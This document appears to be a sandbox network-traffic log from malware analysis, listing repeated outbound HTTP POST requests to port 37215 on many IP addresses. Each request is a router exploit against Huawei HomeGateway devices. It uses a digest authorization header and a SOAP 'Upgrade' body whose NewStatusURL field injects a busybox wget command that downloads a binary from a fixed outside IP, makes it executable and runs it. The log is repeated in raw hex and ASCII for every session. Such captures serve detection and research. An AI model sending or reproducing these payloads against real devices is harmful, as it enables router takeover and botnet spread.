                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              177192.168.2.155880494.179.126.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038204908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              178192.168.2.1535160186.162.79.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038230896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              179192.168.2.1533974190.199.26.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038230896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              180192.168.2.1559634190.226.191.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038235903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              181192.168.2.1550122197.68.203.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038297892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              182192.168.2.1558656121.207.102.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038300991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              183192.168.2.155010631.243.217.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038310051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              184192.168.2.153883441.231.209.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038391113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              185192.168.2.153696037.47.242.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038392067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              186192.168.2.154332431.173.59.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038392067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
